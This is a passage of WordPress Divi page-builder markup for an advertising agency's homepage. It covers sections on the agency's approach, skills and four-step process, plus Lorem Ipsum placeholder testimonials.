_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"|||30px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" hover_enabled=\"0\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"|||30px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" 